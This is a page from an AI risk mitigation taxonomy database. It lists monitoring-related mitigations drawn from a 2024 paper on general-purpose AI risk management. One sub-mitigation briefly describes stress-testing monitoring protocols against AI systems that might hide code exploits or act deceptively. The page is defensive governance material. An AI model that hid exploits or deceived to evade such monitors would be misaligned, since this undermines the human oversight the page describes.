BackMonitoring

This page is still being polished. If you have thoughts, please share them via the feedback form.

Data on this page is preliminary and may change. Please do not share or cite these figures publicly.

Monitoring

Gipiskis (2024)|LLM classified

Mitigation Taxonomy

99Other

Cannot be confidently classified due to insufficient information, excessive vagueness, or ambiguity.

LLM Classification Details

Reasoning

Mitigation name "Monitoring" lacks definition and evidence; cannot identify focal activity or where it occurs.

Code: 99.9Version: v0.6Classified: Feb 6, 2026

Part of

Deployment

Sub-mitigations (6)

Monitoring of model capabilities

AI models are often trained to develop specific capabilities by using appropriate training data and training goals. However, models may develop capabilities that they were not specifically trained for. One subset of this is emergent capabilities, i.e., capabilities that emerged in larger models but not smaller models given a similar training process [215]. These capabilities can be monitored, allowing models to be tested not only for their intended capabilities but also for capabilities that are not intended.

2.2.2 Testing & Evaluation

Lifecycle:Verify and ValidateActor:DeveloperAIRM:Measure

AI model-assisted oversight of AI systems

AI model-assisted oversight can help monitor and supervise the training of increasingly capable GPAI systems, which may become difficult to oversee at scale by human supervisors during training or testing. Monitoring and supervision may become especially difficult in cases where increasingly advanced GPAIs perform near or above human level in some specialized domains, where supervision quality might fail to keep pace with capabilities improvement. The training signal may include labeled data, reward function, and user feedback on produced outputs.

1.1.2 Learning Objectives

Lifecycle:Build and Use ModelActor:DeveloperAIRM:Measure

Post-deployment ongoing monitoring for unexpected use cases

Ongoing monitoring of AI systems can uncover emergent or newly identified capabilities and limitations, in particular when new use cases are found, or in a large-scale deployment with a diverse population of users. These new capabilities or limitations can inform ongoing risk analysis. New use-cases can be discovered via monitoring publications, online forums, or APIs [131]. For example, a LLM might have unexpectedly high competence at giving convincing medical advice, despite not being directly developed for that purpose, nor verified for accuracy. In that case, the potential risks of this newly found competence can be assessed

2.3.3 Monitoring & Logging

Lifecycle:Operate and MonitorActor:DeployerAIRM:Measure

Monitoring protocols for potentially adversarial GPAI systems

Similar to cybersecurity protocols, AI providers can prepare in advance for potential adversarial action from AI systems by developing and stress-testing protocols for potential adversarial action [179]. Such adversarial action may range from hiding code exploits, to strategic deception or loss of control related behaviors. AI systems may be adversarial due to malicious actors (e.g., data poisoning), or due to unintended issues of control (lack of alignment with human intent). Alongside improving the system alignment, external monitoring and restrictions may be deployed in advance to “catch” these adversarial model malfunctions before harm is done. Like with cybersecurity red teaming, any protocol which assumes adversarial action can be stress tested in advance. For example, this can be done by projecting the plausible capabilities and affordances of the adversarial actor (e.g., in the case of a tech company - a hacker, or a disgruntled employee). From this process, measures that better anticipate possible adversarial action can be deployed, and catch unsuccessful attempts at adversarial behavior. If such unsuccessful attempts are caught, they can be reported in incident reports, and serve as an input to further risk analysis. Depending on their severity, it may be advisable to recall the system if deployed.

1.2 Non-Model

Lifecycle:Operate and MonitorActor:DeployerAIRM:Measure

Encouraging downstream provider to evaluate models for deployment-specific failure modes

In some cases, AI system deployers are better positioned to perform certain risk management measures on the AI model in a provided AI system, relative to upstream model providers. For example, they understand their use case better and are more easily able to predict foreseeable misuse or failure modes. These evaluations can inform upstream model providers, or inform supplementary mitigations by the deployer.

3.3.1 Industry Coordination

Lifecycle:Verify and ValidateActor:DeployerAIRM:Measure

Encourage reporting of critical vulnerabilities to the upstream provider or other relevant stakeholders

Downstream AI system deployers can report critical vulnerabilities or incidents to the upstream model provider and other relevant regulators. This can contribute to safe use, and allow other downstream deployers to be informed about any potential problems.

3.3.1 Industry Coordination

Lifecycle:Operate and MonitorActor:DeployerAIRM:Manage

Other mitigations from Gipiskis (2024) (112)

Model development

2.4 Engineering & Development

Lifecycle:Build and Use ModelActor:DeveloperAIRM:Unable to classify

Model development > Data-related

1.1 Model

Lifecycle:Collect and Process DataActor:Unable to classifyAIRM:Unable to classify

Model evaluations

2.2.2 Testing & Evaluation

Lifecycle:Verify and ValidateActor:DeveloperAIRM:Measure

Model evaluations > General evaluations

2.2.2 Testing & Evaluation

Lifecycle:Verify and ValidateActor:DeveloperAIRM:Measure

Model evaluations > Benchmarking

3.2.1 Benchmarks & Evaluation

Lifecycle:Other (outside lifecycle)Actor:DeveloperAIRM:Measure

Model evaluations > Red teaming

2.2.2 Testing & Evaluation

Lifecycle:Verify and ValidateActor:DeveloperAIRM:Measure

View all 112 mitigations from this source →

Source Document

Risk Sources and Risk Management Measures in Support of Standards for General-Purpose AI Systems

Gipiškis, Rokas; San Joaquin, Ayrton; Chin, Ze Shen; Regenfuß, Adrian; Gil, Ariel; Holtman, Koen (2024)

Organizations and governments that develop, deploy, use, and govern AI must coordinate on effective risk mitigation. However, the landscape of AI risk mitigation frameworks is fragmented, uses inconsistent terminology, and has gaps in coverage. This paper introduces a preliminary AI Risk Mitigation Taxonomy to organize AI risk mitigations and provide a common frame of reference. The Taxonomy was developed through a rapid evidence scan of 13 AI risk mitigation frameworks published between 2023-2025, which were extracted into a living database of 831 distinct AI risk mitigations.

View source DOI: 10.48550/arXiv.2410.23472

Classification

AI Lifecycle Stage

Operate and Monitor

Running, maintaining, and monitoring the AI system post-deployment

Responsible Actor

Deployer

Entity that integrates and deploys the AI system for end users

NIST AI RMF Function

Measure

Quantifying, testing, and monitoring identified AI risks